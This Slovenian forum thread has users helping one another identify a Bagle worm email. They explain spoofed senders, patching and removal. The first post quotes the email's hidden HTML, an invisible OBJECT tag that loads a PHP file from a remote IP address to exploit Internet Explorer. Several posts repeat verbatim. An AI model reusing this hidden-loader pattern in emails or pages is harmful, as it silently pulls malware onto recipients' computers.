Forum » Loža » Nov virus ?
Nov virus ?
hanzeljn ::
nisem našel rubrike, ki bi govorila o virusih, zato sprašujem kar tukaj: danes sem dobil dva emaila iz naslovov prokohid@siol.net in letnar.bm@siol.net
Na prvega je reagiral Norton AV, češ da gre za "malicious script", karkoli to pač je. Na drugega ni bilo reakcije.
Emaila sta drugače prazna, brez priponk, naslova pa sta "Re: Incoming Fax" in "Re: Msg Reply"
Če pa pogledam v Properties, pa se pri obeh pokaže neka vsebina, in to je pri enem:
html>body>
font face="System">
OBJECT STYLE="display:none" DATA="http://4.8.40.57:81/920993.php">
/OBJECT>/body>/html>
ter pri drugem:
html>body>
font face="System">
OBJECT STYLE="display:none" DATA="http://66.191.112.44:81/929025.php">
/OBJECT>/body>/html>
Mogoče kdo ve, zakaj gre ?
__________________________
P.S.: kopijo emaila sem moral popraviti, ker slo-tech sistem ni pustil poslati v originalni obliki
______________
Na prvega je reagiral Norton AV, češ da gre za "malicious script", karkoli to pač je. Na drugega ni bilo reakcije.
Emaila sta drugače prazna, brez priponk, naslova pa sta "Re: Incoming Fax" in "Re: Msg Reply"
Če pa pogledam v Properties, pa se pri obeh pokaže neka vsebina, in to je pri enem:
html>body>
font face="System">
OBJECT STYLE="display:none" DATA="http://4.8.40.57:81/920993.php">
/OBJECT>/body>/html>
ter pri drugem:
html>body>
font face="System">
OBJECT STYLE="display:none" DATA="http://66.191.112.44:81/929025.php">
/OBJECT>/body>/html>
Mogoče kdo ve, zakaj gre ?
__________________________
P.S.: kopijo emaila sem moral popraviti, ker slo-tech sistem ni pustil poslati v originalni obliki
______________
daemon ::
Definitivno gre za virus/crv - najbrz za kaksno novejso razlicico (R, S, T, ?) virusa Beagle oz. Bagle, crkovanje je ocitno poljubno
Tista HTML koda poskusa izkoristiti varnostno luknjo v Internet Explorerju.
Podrobnejse informacije o delovanju in odstranitvi pa poglej na kaksni protivirusni strani - npr. tukaj.
Ja, se nekaj pomembnega, kar precej ljudi ne ve - imej v mislih, da tisti e-mail naslovi zelo verjetno niso dejanski posiljatelji, zato jim tudi ne posiljaj nazaj mailov, da imajo okuzen racunalnik. Zakaj je tako?
Kratka razlaga: pravi posiljatelj (=okuzen racunalnik) je najverjetneje nekdo, ki ima v svojem address booku tako tisti posiljateljev naslov, ki si ga napisal, kot tudi tvoj naslov.
Podrobna razlaga: na tistem zgornjem linku najdes vec detajlov, drugace pa lahko vedno vprezes se google, npr. s pojmom "worm address spoofing".
Tista HTML koda poskusa izkoristiti varnostno luknjo v Internet Explorerju.
Podrobnejse informacije o delovanju in odstranitvi pa poglej na kaksni protivirusni strani - npr. tukaj.
Ja, se nekaj pomembnega, kar precej ljudi ne ve - imej v mislih, da tisti e-mail naslovi zelo verjetno niso dejanski posiljatelji, zato jim tudi ne posiljaj nazaj mailov, da imajo okuzen racunalnik. Zakaj je tako?
Kratka razlaga: pravi posiljatelj (=okuzen racunalnik) je najverjetneje nekdo, ki ima v svojem address booku tako tisti posiljateljev naslov, ki si ga napisal, kot tudi tvoj naslov.
Podrobna razlaga: na tistem zgornjem linku najdes vec detajlov, drugace pa lahko vedno vprezes se google, npr. s pojmom "worm address spoofing".
Stripy ::
Nova verzija Bagla. Ogroženi so predvsem uporabniki Outlooka. Dovolj je že samo odpreti mail, pa se izvede skripta, ki namesti virus na računalnik.
Rešitev je namestitev patcha, če pa je virus že na računalniku (kot se je zgodilo meni - geniju), pa obstaja fix_bagle. Da imaš okužen računalnik ugotoviš po delujočem procesu directs.exe.
Rešitev je namestitev patcha, če pa je virus že na računalniku (kot se je zgodilo meni - geniju), pa obstaja fix_bagle. Da imaš okužen računalnik ugotoviš po delujočem procesu directs.exe.
Yohan del Sud ::
Heh, ravnokar se mi je pojavil virus alert za beagle. Res se sproži samo že če ga hočes odvlečt v koš. Antivirus, ga je dal v karanteno.
Caligula ::
Ce mas mail prek Iproma recmo ti ga itak ze gor blokira.
MAtr, sploh ne morem vec v Outlook virusov dobivat k v starih dobrih casih
Pa bi prou rad, da bi ga moje antivirusno kolesje zmlelo
MAtr, sploh ne morem vec v Outlook virusov dobivat k v starih dobrih casih
Pa bi prou rad, da bi ga moje antivirusno kolesje zmlelo
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | Prikaz strani na različni resoluciji-JoomlaOddelek: Izdelava spletišč | 1929 (1657) | kr?en |
» | Show/hide rows tabelah (javascript)Oddelek: Izdelava spletišč | 1020 (1020) | Tody |
» | določena oseba mi stalno pošiljanj viruseOddelek: Pomoč in nasveti | 1345 (1062) | waters |
» | Kaj naredite, ko dobite virus po emailu? Ga izbrišete, ali ...Oddelek: Omrežja in internet | 1923 (1511) | Tody |
» | Za glodanje: nek čuden virus ie/mirc virusOddelek: Omrežja in internet | 3402 (2513) | Predator |